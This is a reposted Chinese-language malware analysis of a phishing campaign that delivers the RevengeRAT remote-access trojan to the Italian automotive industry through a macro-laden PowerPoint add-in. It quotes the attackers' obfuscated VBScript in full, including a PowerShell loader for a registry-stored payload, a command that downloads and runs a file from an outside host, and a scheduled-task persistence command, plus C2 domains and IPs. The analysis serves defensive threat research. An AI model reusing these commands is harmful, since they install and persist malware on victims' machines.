未加星标

攻防最前线:RevengeRAT远控瞄准意大利汽车行业

字体大小 | |
[系统(windows) 所属分类 系统(windows) | 发布者 店小二03 | 时间 2019 | 作者 红领巾 ] 0人收藏点击收藏

攻防最前线:RevengeRAT远控瞄准意大利汽车行业

最近,Cybaze-Yoroi ZLab的研究人员对一款针对意大利汽车行业的间谍恶意软件进行了分析。该恶意软件是通过钓鱼电子邮件传播的,攻击者试图伪装成巴西一家知名商业律师事务所的高级合伙人――Veirano Advogados。

恶意电子邮件的附件是一个PowerPoint外接程序文件(.ppa文件),包含能够自动运行的VBA宏代码。


攻防最前线:RevengeRAT远控瞄准意大利汽车行业

图1:.ppa文件打开时显示的弹出窗口

技术分析 上述.ppa文件中的宏代码包含一个简单的指令,能够调用“mshta.exe”工具从“hxxps://minhacasaminhavidacdt.blogspot[.com/”下载并执行用于感染链下一阶段的dropper。
攻防最前线:RevengeRAT远控瞄准意大利汽车行业

图2:从.ppa文件中提取出来的宏

由上面这个Blogspot URL托管的Web页面从表面上看是完全合法的――在浏览器中打开它,你只会看到一个记录工作进度的博客页面。


攻防最前线:RevengeRAT远控瞄准意大利汽车行业

图3:由上述Blogspot URL托管的Web页面

但是,如果仔细查看它的源代码,你就会发现它实际上包含了一段恶意VBScript代码。


攻防最前线:RevengeRAT远控瞄准意大利汽车行业

图4:隐藏在网页源代码中的Visual Basic脚本

有趣的是,该恶意软件的作者还试图误导受害者认为这个脚本来自“微软公司”。比如,我们可以在上图中就看到如下内容:

‘ Copyright: Microsoft Corp. ‘ This script is designed to be used only for scheduled tasks(s). ‘ There is no extensive error check, and will not dump the output from the Powershell CmdLet. ‘ ‘ Usage: SyncAppvPublishingServer {cmdline-args(passthrough to cmdlet)}

实际上,这段内容是“SyncAppvPublishingServer”实用程序的一部分。对于运行windows 10的计算机而言,这个实用程序通常位于“C:\Windows\System32\SyncAppvPublishingServer.vbs”。无论如何,除这段内容外,上述脚本的其余部分则被用于执行一系列恶意操作:

将一个base64编码版本的“RevengeRAT”payload存储到位于“HKCU\AppEvents\Values”的注册表项中。 CreateObject("Wscript.Shell").regwrite "HKCU\AppEvents\Values", "TVqQAAMAAAAEAAAA//8AALgAAA.....[continue]" , "REG_SZ" 解码并执行存储的payload。 Set A0102030405 = CreateObject("WScript.Shell") Dim CDT0908087CDT CDT0908087CDT = "cmd." + "exe /C rundll32." + "exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""cmd." + "exe /c power" + "shell -" + "Execution" + "Policy Bypass -windows" + "tyle hidden -noexit -Command [Reflection." + "Assembly]::Load([Convert]::FromBase64String((Get-ItemProperty HKCU:\AppEvents).Values)).EntryPoint" + ".Invoke($N" + "ull,$" + "Null)"",0,true);" A0102030405.run CDT0908087CDT, vbHide 创建并执行另一个VBScript脚本“%AppData%\Local\Temp\Z3j.vbs”。需要注意的是,这个脚本能够从“hxxp://cdtmaster.com[.]br”下载一个新的payload。

Set XbonXo = CreateObject("WScript.Shell")

Dim XoowA83AC

XoowA83AC = "c" + "M" + "d /c cd %TEMP% &@echo Z6h = ""h" + "t" + "tp://cdtmaster.com.br/Document." + "mp3"">>Z3j.vbs &@echo M2l = M5t(""R]Qc[S\b >Z3j.vbs &@echo Set M1s = CreateObject(M5t(""[af[Z@ >Z3j.vbs &@echo M1s.Open M5t(""USb""), Z6h, False>>Z3j.vbs &@echo M1s.send ("""")>>Z3j.vbs &@echo Set E3i = CreateObject(M5t(""OR]RP >Z3j.vbs &@echo E3i.Open>>Z3j.vbs &@echo E3i.Type = 1 >>Z3j.vbs &@echo E3i.Write M1s.ResponseBody>>Z3j.vbs & @echo E3i.Position = 0 >>Z3j.vbs &@echo E3i.SaveToFile M2l, 2 >>Z3j.vbs &@echo E3i.Close>>Z3j.vbs &@echo function M5t(N3y) >> Z3j.vbs &@echo For S2r = 1 To Len(N3y) >>Z3j.vbs &@echo E0k = Mid(N3y, S2r, 1) >>Z3j.vbs &@echo E0k = Chr(Asc(E0k)- 14) >>Z3j.vbs &@echo G3f = G3f + E0k >> Z3j.vbs &@echo Next >>Z3j.vbs &@echo M5t = G3f >>Z3j.vbs &@echo End Function >>Z3j.vbs& Z3j.vbs &dEl Z3j.vbs & timeout 2 & DOCUMENT.EXE"

XbonXo.Run XoowA83AC, vbHide

最后,创建一个新的计划任务――每两个小时使用“hxxps://pocasideiascdt.blogspot[.]com/”参数运行一次上述“exe”工具。这个URL指向的网页实际上是“https://minhacasaminhavidacdt.blogspot[.]com/”的一个镜像。 Dim OUGo57658586GFFJHG Set OUGo57658586GFFJHG = CreateObject("WScript.Shell") asdmmmc= "c" + "Md /c Sc" + "hTa" + "sks /Cre" + "ate /sc MIN" + "UTE /MO 120 /TN OfficeData /TR ""m" + "sh" + "ta." + "exe h" + "ttp" + "s://pocasideiascdt.blogspot.com/"" /F " OUGo57658586GFFJHG.Run asdmmmc, vbHide self.close
攻防最前线:RevengeRAT远控瞄准意大利汽车行业

图5:用于实现持久性的计划任务

总的来说,感染链的最后阶段旨在安装隐藏在注册表项中的RevengeRAT变种,并运行由二进制文件“Document.exe ”(从hxxp://cdtmaster.com[.]br/Document.mp3下载)提取的可执行文件“outlook.exe”。
攻防最前线:RevengeRAT远控瞄准意大利汽车行业

图6. Roma255感染链

RevengeRAT Payload 一旦被执行,这个RAT就会立即与其命令和控制(C2)服务器建立连接,并发送有关受害者计算机的信息。对于Cybaze-Yoroi ZLab分析的样本而言,其作者为它配置了两个不同的C2地址:“office365update[.]duckdns.org”和“systen32.ddns[.]net”。
攻防最前线:RevengeRAT远控瞄准意大利汽车行业

图7: RevengeRAT的配置

如果其中一个出现了故障,这个RAT就会转向使用另一个。在撰写本文时,这两个C2都处于关闭状态,因此只有模拟服务器的行为才能继续对RAT发送的信息进行分析。

总之,这个RAT首先会与服务器建立TCP连接,并向其发送以下数据:


攻防最前线:RevengeRAT远控瞄准意大利汽车行业

图8:RevengeRAT发送的数据

如果你仔细观察,就能够在数据字段之间发现一个反复出现的字符串――roma225。它被用作分隔符,也是为什么Cybaze-Yoroi ZLab将这场活动命名为“roma225”的原因。

拆分并解码上述数据,我们便可以很清楚地了解到RAT上传了哪些信息。


攻防最前线:RevengeRAT远控瞄准意大利汽车行业

图9:解码后的数据

如上所述,在撰写本文时,两个C2都处于关闭状态。但对这两个C2地址的分析表明,攻击者的基础设施可能位于不同的国家。

例如,域名“office365update[.]duckdns.org”被解析为IP地址184.75.209.169,位于加拿大。
攻防最前线:RevengeRAT远控瞄准意大利汽车行业
此外,域名“systen32.ddns[.]net”被解析为IP地址138.36.3.228,位于巴西。
攻防最前线:RevengeRAT远控瞄准意大利汽车行业
Document.exe “Document.exe”托管在“cdtmaster.com[.]br”上,实际上是通过脚本“Z3j.vbs”下载到受害者计算机中的。这个PE32文件的一个显著特征是使用了Pokemon Megaball图片来作为它的图标,它的唯一目的就是安装并运行“Outlook.exe”payload。
攻防最前线:RevengeRAT远控瞄准意大利汽车行业

对“Outlook.exe”的静态分析表明,它试图伪装成“SendBlaster”,一款电子邮件群发工具,目前由意大利eDisplay Srl公司负责开发。


攻防最前线:RevengeRAT远控瞄准意大利汽车行业

图10:Outlook.exe静态信息

当“Document.exe”被执行时,没有网络流量发出或文件系统遭到修改。但是,它将一个监听套接字绑定到了本地地址和端口“tcp://127.0.0.1:49356”上。

目前,Cybaze-Yoroi ZLab的研究人员仍在继续对这个“Outlook.exe”文件进行分析,以揭露其真实目的。

总结

在进行了第一次分析之后,Cybaze-Yoroi ZLab并没有能够将这起网络间谍活动归因于特定的网络犯罪团伙。因为,RevengeRAT此前就已经被许多APT组织使用过,比如Gorgon Group(由 Unit42 的研究人员分析过的一个APT组织,曾针对英国、西班牙、俄罗斯和美国的政府机构实施过网络间谍活动)。另外,这个APT的源代码在几年前还曾遭到过泄露,它很有可能已经成为了许多网络犯罪团伙的攻击工具之一。

无论如何,这起活动与Unit42所分析的活动的确存在一些相似之处。比如,使用了相似的基础设施(如本文中的Blogger网站)来托管dropper,以及使用了其他主流RAT作为最终的后门(如njRAT)。

事实上,“cdtmaster.com.]br”还托管有其他可疑文件。比如,二进制文件“nj.mp3 ”。这个文件实际上就是njRAT的一个变种。如上所述,针对这些文件的调查仍在进行中。


攻防最前线:RevengeRAT远控瞄准意大利汽车行业
图11:托管在ctdmaster.com[.br上的恶意文件

声明:本文来自黑客视界,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如需转载,请联系原作者获取授权。

本文系统(windows)相关术语:三级网络技术 计算机三级网络技术 网络技术基础 计算机网络技术

代码区博客精选文章
分页:12
转载请注明
本文标题:攻防最前线:RevengeRAT远控瞄准意大利汽车行业
本站链接:https://www.codesec.net/view/627905.html


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 系统(windows) | 评论(0) | 阅读(41)